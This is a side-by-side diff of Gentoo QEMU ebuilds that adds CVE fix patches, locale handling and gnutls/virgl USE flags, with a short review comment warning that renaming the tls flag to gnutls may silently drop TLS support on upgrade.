seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] ) seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
smartcard? ( dev-libs/nss !app-emulation/libcacard ) smartcard? ( >=app-emulation/libcacard-2.5.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] ) snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( spice? (
>=app-emulation/spice-protocol-0.12.3 >=app-emulation/spice-protocol-0.12.3
>=app-emulation/spice-0.12.0[static-libs(+)] >=app-emulation/spice-0.12.0[static-libs(+)]
) )
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] ) ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r2[static-libs(+)] ) usb? ( >=virtual/libusb-1-r2[static-libs(+)] )
usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] ) usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] ) uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] ) vde? ( net-misc/vde[static-libs(+)] )
virgl? ( media-libs/virglrenderer[static-libs(+)] )
virtfs? ( sys-libs/libcap ) virtfs? ( sys-libs/libcap )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )" xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}" USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
@ -150,7 +159,7 @@ CDEPEND="
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} ) qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
python? ( ${PYTHON_DEPS} ) python? ( ${PYTHON_DEPS} )
systemtap? ( dev-util/systemtap ) systemtap? ( dev-util/systemtap )
xen? ( app-emulation/xen-tools )" xen? ( app-emulation/xen-tools:= )"
DEPEND="${CDEPEND} DEPEND="${CDEPEND}
dev-lang/perl dev-lang/perl
=dev-lang/python-2* =dev-lang/python-2*
@ -288,6 +297,29 @@ check_targets() {
popd >/dev/null popd >/dev/null
} }
handle_locales() {
# Make sure locale list is kept up-to-date.
local detected sorted
detected=$(echo $(cd po && printf '%s\n' *.po | grep -v messages.po | sed 's:.po$::' | sort -u))
sorted=$(echo $(printf '%s\n' ${PLOCALES} | sort -u))
if [[ ${sorted} != "${detected}" ]] ; then
eerror "The ebuild needs to be kept in sync."
eerror "PLOCALES: ${sorted}"
eerror " po/*.po: ${detected}"
die "sync PLOCALES"
fi
# Deal with selective install of locales.
if use nls ; then
# Delete locales the user does not want. #577814
rm_loc() { rm po/$1.po || die; }
l10n_for_each_disabled_locale_do rm_loc
else
# Cheap hack to disable gettext .mo generation.
rm -f po/*.po
fi
}
src_prepare() { src_prepare() {
check_targets IUSE_SOFTMMU_TARGETS softmmu check_targets IUSE_SOFTMMU_TARGETS softmmu
check_targets IUSE_USER_TARGETS linux-user check_targets IUSE_USER_TARGETS linux-user
@ -297,17 +329,29 @@ src_prepare() {
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \ -e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation. epatch "${FILESDIR}"/qemu-2.5.0-cflags.patch
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${P}-block-mirror-crash.patch #558396
epatch "${FILESDIR}"/${P}-CVE-2015-5225.patch #558416
epatch "${FILESDIR}"/${PN}-2.4.0-e1000-loop.patch #559656
[[ -n ${BACKPORTS} ]] && \ [[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \ EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch epatch
epatch "${FILESDIR}"/${P}-CVE-2015-8567.patch #567868
epatch "${FILESDIR}"/${P}-CVE-2015-8558.patch #568246
epatch "${FILESDIR}"/${P}-CVE-2015-8701.patch #570110
epatch "${FILESDIR}"/${P}-CVE-2015-8743.patch #570988
epatch "${FILESDIR}"/${P}-CVE-2016-1568.patch #571566
epatch "${FILESDIR}"/${P}-CVE-2015-8613.patch #569118
epatch "${FILESDIR}"/${P}-CVE-2015-8619.patch #569300
epatch "${FILESDIR}"/${P}-CVE-2016-1714.patch #571560
epatch "${FILESDIR}"/${P}-CVE-2016-1922.patch #572082
epatch "${FILESDIR}"/${P}-CVE-2016-1981.patch #572412
epatch "${FILESDIR}"/${P}-usb-ehci-oob.patch #572454
epatch "${FILESDIR}"/${P}-CVE-2016-2197.patch #573280
epatch "${FILESDIR}"/${P}-CVE-2016-2198.patch #573314
epatch "${FILESDIR}"/${P}-CVE-2016-2392.patch #574902
epatch "${FILESDIR}"/${P}-usb-ndis-int-overflow.patch #575492
epatch "${FILESDIR}"/${P}-rng-stack-corrupt-{0,1,2,3}.patch #576420
epatch "${FILESDIR}"/${P}-sysmacros.patch
# Fix ld and objcopy being called directly # Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY tc-export AR LD OBJCOPY
@ -315,6 +359,9 @@ src_prepare() {
MAKEOPTS+=" V=1" MAKEOPTS+=" V=1"
epatch_user epatch_user
# Run after we've applied all patches.
handle_locales
} }
## ##
@ -339,6 +386,11 @@ qemu_src_configure() {
--disable-guest-agent --disable-guest-agent
--disable-strip --disable-strip
--disable-werror --disable-werror
# We support gnutls/nettle for crypto operations. It is possible
# to use gcrypt when gnutls/nettle are disabled (but not when they
# are enabled), but it's not really worth the hassle. Disable it
# all the time to avoid automatically detecting it. #568856
--disable-gcrypt
--python="${PYTHON}" --python="${PYTHON}"
--cc="$(tc-getCC)" --cc="$(tc-getCC)"
--cxx="$(tc-getCXX)" --cxx="$(tc-getCXX)"
@ -367,6 +419,8 @@ qemu_src_configure() {
$(conf_softmmu curl) $(conf_softmmu curl)
$(conf_softmmu fdt) $(conf_softmmu fdt)
$(conf_softmmu glusterfs) $(conf_softmmu glusterfs)
$(conf_softmmu gnutls)
$(conf_softmmu gnutls nettle)
$(conf_softmmu gtk) $(conf_softmmu gtk)
$(conf_softmmu infiniband rdma) $(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi) $(conf_softmmu iscsi libiscsi)
@ -382,16 +436,16 @@ qemu_src_configure() {
$(conf_softmmu sasl vnc-sasl) $(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl) $(conf_softmmu sdl)
$(conf_softmmu seccomp) $(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss) $(conf_softmmu smartcard)
$(conf_softmmu snappy) $(conf_softmmu snappy)
$(conf_softmmu spice) $(conf_softmmu spice)
$(conf_softmmu ssh libssh2) $(conf_softmmu ssh libssh2)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu usb libusb) $(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir) $(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid) $(conf_softmmu uuid)
$(conf_softmmu vde) $(conf_softmmu vde)
$(conf_softmmu vhost-net) $(conf_softmmu vhost-net)
$(conf_softmmu virgl virglrenderer)
$(conf_softmmu virtfs) $(conf_softmmu virtfs)
$(conf_softmmu vnc) $(conf_softmmu vnc)
$(conf_softmmu vte) $(conf_softmmu vte)
@ -565,12 +619,12 @@ src_install() {
doins "${FILESDIR}/bridge.conf" doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt # Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/" mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/" || die
cd "${S}" cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt dodoc docs/qmp-*.txt
if [[ -n ${softmmu_targets} ]]; then if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one # Remove SeaBIOS since we're using the SeaBIOS packaged one
@ -624,10 +678,6 @@ pkg_postinst() {
fi fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
} }
pkg_info() { pkg_info() {


@ -1,4 +1,4 @@
# Copyright 1999-2015 Gentoo Foundation # Copyright 1999-2016 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
# $Id$ # $Id$
@ -7,8 +7,10 @@ EAPI=5
PYTHON_COMPAT=( python2_7 ) PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline" PYTHON_REQ_USE="ncurses,readline"
PLOCALES="de_DE fr_FR hu it tr zh_CN"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils user udev fcaps readme.gentoo pax-utils l10n
BACKPORTS= BACKPORTS=
@ -20,7 +22,7 @@ else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2 SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+ ${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}" https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="~amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd" KEYWORDS="amd64 ~arm64 ~ppc ~ppc64 x86 ~x86-fbsd"
fi fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools" DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
@ -29,18 +31,18 @@ HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2" LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0" SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \ IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \ gnutls gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \ +png pulseaudio python \
rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \ static-user systemtap tci test +threads usb usbredir +uuid vde +vhost-net \
virtfs +vnc vte xattr xen xfs" virgl virtfs +vnc vte xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32 mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64" x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb" IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus" IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus tilegx"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS}) use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS}) use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
@ -65,6 +67,9 @@ REQUIRED_USE="${PYTHON_REQUIRED_USE}
# The attr lib isn't always linked in (although the USE flag is always # The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API # respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library. # when available rather than always using the extranl library.
#
# Older versions of gnutls are supported, but it's simpler to just require
# the latest versions. This is also why we require nettle.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)] COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)] sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )" xattr? ( sys-apps/attr[static-libs(+)] )"
@ -78,6 +83,10 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] ) curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] ) fdt? ( >=sys-apps/dtc-1.4.0[static-libs(+)] )
glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] ) glusterfs? ( >=sys-cluster/glusterfs-3.4.0[static-libs(+)] )
gnutls? (
dev-libs/nettle[static-libs(+)]
>=net-libs/gnutls-3.0[static-libs(+)]
)
gtk? ( gtk? (
gtk2? ( gtk2? (
x11-libs/gtk+:2 x11-libs/gtk+:2
@ -116,18 +125,18 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
) )
) )
seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] ) seccomp? ( >=sys-libs/libseccomp-2.1.0[static-libs(+)] )
smartcard? ( dev-libs/nss !app-emulation/libcacard ) smartcard? ( >=app-emulation/libcacard-2.5.0[static-libs(+)] )
snappy? ( app-arch/snappy[static-libs(+)] ) snappy? ( app-arch/snappy[static-libs(+)] )
spice? ( spice? (
>=app-emulation/spice-protocol-0.12.3 >=app-emulation/spice-protocol-0.12.3
>=app-emulation/spice-0.12.0[static-libs(+)] >=app-emulation/spice-0.12.0[static-libs(+)]
) )
ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] ) ssh? ( >=net-libs/libssh2-1.2.8[static-libs(+)] )
tls? ( net-libs/gnutls[static-libs(+)] )
usb? ( >=virtual/libusb-1-r2[static-libs(+)] ) usb? ( >=virtual/libusb-1-r2[static-libs(+)] )
usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] ) usbredir? ( >=sys-apps/usbredir-0.6[static-libs(+)] )
uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] ) uuid? ( >=sys-apps/util-linux-2.16.0[static-libs(+)] )
vde? ( net-misc/vde[static-libs(+)] ) vde? ( net-misc/vde[static-libs(+)] )
virgl? ( media-libs/virglrenderer[static-libs(+)] )
virtfs? ( sys-libs/libcap ) virtfs? ( sys-libs/libcap )
xfs? ( sys-fs/xfsprogs[static-libs(+)] )" xfs? ( sys-fs/xfsprogs[static-libs(+)] )"
USER_LIB_DEPEND="${COMMON_LIB_DEPEND}" USER_LIB_DEPEND="${COMMON_LIB_DEPEND}"
@ -150,7 +159,7 @@ CDEPEND="
qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} ) qemu_softmmu_targets_x86_64? ( ${X86_FIRMWARE_DEPEND} )
python? ( ${PYTHON_DEPS} ) python? ( ${PYTHON_DEPS} )
systemtap? ( dev-util/systemtap ) systemtap? ( dev-util/systemtap )
xen? ( app-emulation/xen-tools )" xen? ( app-emulation/xen-tools:= )"
DEPEND="${CDEPEND} DEPEND="${CDEPEND}
dev-lang/perl dev-lang/perl
=dev-lang/python-2* =dev-lang/python-2*
@ -205,11 +214,14 @@ QA_WX_LOAD="usr/bin/qemu-i386
DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure DOC_CONTENTS="If you don't have kvm compiled into the kernel, make sure
you have the kernel module loaded before running kvm. The easiest way to you have the kernel module loaded before running kvm. The easiest way to
ensure that the kernel module is loaded is to load it on boot.\n ensure that the kernel module is loaded is to load it on boot.\n
For AMD CPUs the module is called 'kvm-amd'\n For AMD CPUs the module is called 'kvm-amd'.\n
For Intel CPUs the module is called 'kvm-intel'\n For Intel CPUs the module is called 'kvm-intel'.\n
Please review /etc/conf.d/modules for how to load these\n\n Please review /etc/conf.d/modules for how to load these.\n\n
Make sure your user is in the 'kvm' group\n Make sure your user is in the 'kvm' group\n
Just run 'gpasswd -a <USER> kvm', then have <USER> re-login." Just run 'gpasswd -a <USER> kvm', then have <USER> re-login.\n\n
For brand new installs, the default permissions on /dev/kvm might not let you
access it. You can tell udev to reset ownership/perms:\n
udevadm trigger -c add /dev/kvm"
qemu_support_kvm() { qemu_support_kvm() {
if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \ if use qemu_softmmu_targets_x86_64 || use qemu_softmmu_targets_i386 \
@ -288,6 +300,29 @@ check_targets() {
popd >/dev/null popd >/dev/null
} }
handle_locales() {
# Make sure locale list is kept up-to-date.
local detected sorted
detected=$(echo $(cd po && printf '%s\n' *.po | grep -v messages.po | sed 's:.po$::' | sort -u))
sorted=$(echo $(printf '%s\n' ${PLOCALES} | sort -u))
if [[ ${sorted} != "${detected}" ]] ; then
eerror "The ebuild needs to be kept in sync."
eerror "PLOCALES: ${sorted}"
eerror " po/*.po: ${detected}"
die "sync PLOCALES"
fi
# Deal with selective install of locales.
if use nls ; then
# Delete locales the user does not want. #577814
rm_loc() { rm po/$1.po || die; }
l10n_for_each_disabled_locale_do rm_loc
else
# Cheap hack to disable gettext .mo generation.
rm -f po/*.po
fi
}
src_prepare() { src_prepare() {
check_targets IUSE_SOFTMMU_TARGETS softmmu check_targets IUSE_SOFTMMU_TARGETS softmmu
check_targets IUSE_USER_TARGETS linux-user check_targets IUSE_USER_TARGETS linux-user
@ -297,17 +332,31 @@ src_prepare() {
-e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \ -e 's/^(C|OP_C|HELPER_C)FLAGS=/\1FLAGS+=/' \
Makefile Makefile.target || die Makefile Makefile.target || die
# Cheap hack to disable gettext .mo generation. epatch "${FILESDIR}"/qemu-2.5.0-cflags.patch
use nls || rm -f po/*.po
epatch "${FILESDIR}"/qemu-1.7.0-cflags.patch
epatch "${FILESDIR}"/${PN}-2.4.0-block-mirror-crash.patch #558396
epatch "${FILESDIR}"/${PN}-2.4.0-CVE-2015-7295-{1,2,3}.patch #560760
epatch "${FILESDIR}"/${PN}-2.4.0-CVE-2015-6855.patch #560422
[[ -n ${BACKPORTS} ]] && \ [[ -n ${BACKPORTS} ]] && \
EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \ EPATCH_FORCE=yes EPATCH_SUFFIX="patch" EPATCH_SOURCE="${S}/patches" \
epatch epatch
epatch "${FILESDIR}"/${P}-CVE-2015-8567.patch #567868
epatch "${FILESDIR}"/${P}-CVE-2015-8558.patch #568246
epatch "${FILESDIR}"/${P}-CVE-2015-8701.patch #570110
epatch "${FILESDIR}"/${P}-CVE-2015-8743.patch #570988
epatch "${FILESDIR}"/${P}-CVE-2016-1568.patch #571566
epatch "${FILESDIR}"/${P}-CVE-2015-8613.patch #569118
epatch "${FILESDIR}"/${P}-CVE-2015-8619.patch #569300
epatch "${FILESDIR}"/${P}-CVE-2016-1714.patch #571560
epatch "${FILESDIR}"/${P}-CVE-2016-1922.patch #572082
epatch "${FILESDIR}"/${P}-CVE-2016-1981.patch #572412
epatch "${FILESDIR}"/${P}-usb-ehci-oob.patch #572454
epatch "${FILESDIR}"/${P}-CVE-2016-2197.patch #573280
epatch "${FILESDIR}"/${P}-CVE-2016-2198.patch #573314
epatch "${FILESDIR}"/${P}-CVE-2016-2392.patch #574902
epatch "${FILESDIR}"/${P}-usb-ndis-int-overflow.patch #575492
epatch "${FILESDIR}"/${P}-rng-stack-corrupt-{0,1,2,3}.patch #576420
epatch "${FILESDIR}"/${P}-sysmacros.patch
epatch "${FILESDIR}"/${P}-ne2000-reg-check.patch #573816
epatch "${FILESDIR}"/${P}-9pfs-segfault.patch #578142
# Fix ld and objcopy being called directly # Fix ld and objcopy being called directly
tc-export AR LD OBJCOPY tc-export AR LD OBJCOPY
@ -315,6 +364,9 @@ src_prepare() {
MAKEOPTS+=" V=1" MAKEOPTS+=" V=1"
epatch_user epatch_user
# Run after we've applied all patches.
handle_locales
} }
## ##
@ -339,6 +391,11 @@ qemu_src_configure() {
--disable-guest-agent --disable-guest-agent
--disable-strip --disable-strip
--disable-werror --disable-werror
# We support gnutls/nettle for crypto operations. It is possible
# to use gcrypt when gnutls/nettle are disabled (but not when they
# are enabled), but it's not really worth the hassle. Disable it
# all the time to avoid automatically detecting it. #568856
--disable-gcrypt
--python="${PYTHON}" --python="${PYTHON}"
--cc="$(tc-getCC)" --cc="$(tc-getCC)"
--cxx="$(tc-getCXX)" --cxx="$(tc-getCXX)"
@ -367,6 +424,8 @@ qemu_src_configure() {
$(conf_softmmu curl) $(conf_softmmu curl)
$(conf_softmmu fdt) $(conf_softmmu fdt)
$(conf_softmmu glusterfs) $(conf_softmmu glusterfs)
$(conf_softmmu gnutls)
$(conf_softmmu gnutls nettle)
$(conf_softmmu gtk) $(conf_softmmu gtk)
$(conf_softmmu infiniband rdma) $(conf_softmmu infiniband rdma)
$(conf_softmmu iscsi libiscsi) $(conf_softmmu iscsi libiscsi)
@ -382,16 +441,16 @@ qemu_src_configure() {
$(conf_softmmu sasl vnc-sasl) $(conf_softmmu sasl vnc-sasl)
$(conf_softmmu sdl) $(conf_softmmu sdl)
$(conf_softmmu seccomp) $(conf_softmmu seccomp)
$(conf_softmmu smartcard smartcard-nss) $(conf_softmmu smartcard)
$(conf_softmmu snappy) $(conf_softmmu snappy)
$(conf_softmmu spice) $(conf_softmmu spice)
$(conf_softmmu ssh libssh2) $(conf_softmmu ssh libssh2)
$(conf_softmmu tls vnc-tls)
$(conf_softmmu usb libusb) $(conf_softmmu usb libusb)
$(conf_softmmu usbredir usb-redir) $(conf_softmmu usbredir usb-redir)
$(conf_softmmu uuid) $(conf_softmmu uuid)
$(conf_softmmu vde) $(conf_softmmu vde)
$(conf_softmmu vhost-net) $(conf_softmmu vhost-net)
$(conf_softmmu virgl virglrenderer)
$(conf_softmmu virtfs) $(conf_softmmu virtfs)
$(conf_softmmu vnc) $(conf_softmmu vnc)
$(conf_softmmu vte) $(conf_softmmu vte)
@ -565,12 +624,12 @@ src_install() {
doins "${FILESDIR}/bridge.conf" doins "${FILESDIR}/bridge.conf"
# Remove the docdir placed qmp-commands.txt # Remove the docdir placed qmp-commands.txt
mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/qmp/" mv "${ED}/usr/share/doc/${PF}/html/qmp-commands.txt" "${S}/docs/" || die
cd "${S}" cd "${S}"
dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt dodoc Changelog MAINTAINERS docs/specs/pci-ids.txt
newdoc pc-bios/README README.pc-bios newdoc pc-bios/README README.pc-bios
dodoc docs/qmp/*.txt dodoc docs/qmp-*.txt
if [[ -n ${softmmu_targets} ]]; then if [[ -n ${softmmu_targets} ]]; then
# Remove SeaBIOS since we're using the SeaBIOS packaged one # Remove SeaBIOS since we're using the SeaBIOS packaged one
@ -624,10 +683,6 @@ pkg_postinst() {
fi fi
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
if use virtfs && [ -n "${softmmu_targets}" ]; then
local virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
fi
} }
pkg_info() { pkg_info() {
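Review bot: The IUSE hunk drops `tls` and adds `gnutls` with no `+` default, and qemu_src_configure now passes `$(conf_softmmu gnutls)` with `--disable-gcrypt` forced, so a user who had USE=tls set ends up after the upgrade with a build that links no TLS library unless they notice the rename. How QEMU then reacts when TLS is requested for VNC is not visible in these hunks, but the rename deserves an upgrade message, for example `elog "USE=tls was replaced by USE=gnutls; enable it to keep TLS support."` in pkg_postinst, whose body lies mostly outside the hunk shown. The same rename appears in the other qemu ebuild sections of this commit.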


@ -1,4 +1,4 @@
# Copyright 1999-2015 Gentoo Foundation # Copyright 1999-2016 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2 # Distributed under the terms of the GNU General Public License v2
# $Id$ # $Id$
@ -7,8 +7,10 @@ EAPI=5
PYTHON_COMPAT=( python2_7 ) PYTHON_COMPAT=( python2_7 )
PYTHON_REQ_USE="ncurses,readline" PYTHON_REQ_USE="ncurses,readline"
PLOCALES="de_DE fr_FR hu it tr zh_CN"
inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \ inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
user udev fcaps readme.gentoo pax-utils user udev fcaps readme.gentoo pax-utils l10n
BACKPORTS= BACKPORTS=
@ -20,7 +22,7 @@ else
SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2 SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
${BACKPORTS:+ ${BACKPORTS:+
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}" https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz}"
KEYWORDS="~amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd" KEYWORDS="amd64 ~arm64 ~ppc ~ppc64 x86 ~x86-fbsd"
fi fi
DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools" DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
@ -29,18 +31,18 @@ HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org"
LICENSE="GPL-2 LGPL-2 BSD-2" LICENSE="GPL-2 LGPL-2 BSD-2"
SLOT="0" SLOT="0"
IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \ IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
gtk gtk2 infiniband iscsi +jpeg \ gnutls gtk gtk2 infiniband iscsi +jpeg \
kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
+png pulseaudio python \ +png pulseaudio python \
rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu rbd sasl +seccomp sdl sdl2 selinux smartcard snappy spice ssh static static-softmmu
static-user systemtap tci test +threads tls usb usbredir +uuid vde +vhost-net \ static-user systemtap tci test +threads usb usbredir +uuid vde +vhost-net \
virtfs +vnc vte xattr xen xfs" virgl virtfs +vnc vte xattr xen xfs"
COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips COMMON_TARGETS="aarch64 alpha arm cris i386 m68k microblaze microblazeel mips
mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32 mips64 mips64el mipsel or32 ppc ppc64 s390x sh4 sh4eb sparc sparc64 unicore32
x86_64" x86_64"
IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb" IUSE_SOFTMMU_TARGETS="${COMMON_TARGETS} lm32 moxie ppcemb tricore xtensa xtensaeb"
IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus" IUSE_USER_TARGETS="${COMMON_TARGETS} armeb mipsn32 mipsn32el ppc64abi32 ppc64le sparc32plus tilegx"
use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS}) use_softmmu_targets=$(printf ' qemu_softmmu_targets_%s' ${IUSE_SOFTMMU_TARGETS})
use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS}) use_user_targets=$(printf ' qemu_user_targets_%s' ${IUSE_USER_TARGETS})
@ -65,6 +67,9 @@ REQUIRED_USE="${PYTHON_REQUIRED_USE}
# The attr lib isn't always linked in (although the USE flag is always # The attr lib isn't always linked in (although the USE flag is always
# respected). This is because qemu supports using the C library's API # respected). This is because qemu supports using the C library's API
# when available rather than always using the extranl library. # when available rather than always using the extranl library.
#
# Older versions of gnutls are supported, but it's simpler to just require
# the latest versions. This is also why we require nettle.
COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)] COMMON_LIB_DEPEND=">=dev-libs/glib-2.0[static-libs(+)]
sys-libs/zlib[static-libs(+)] sys-libs/zlib[static-libs(+)]
xattr? ( sys-apps/attr[static-libs(+)] )" xattr? ( sys-apps/attr[static-libs(+)] )"
@ -78,6 +83,10 @@ SOFTMMU_LIB_DEPEND="${COMMON_LIB_DEPEND}
curl? ( >=net-misc/curl-7.15.4[static-libs(+)] ) curl? ( >=net-misc/curl-7.15.4[static-libs(+)] )
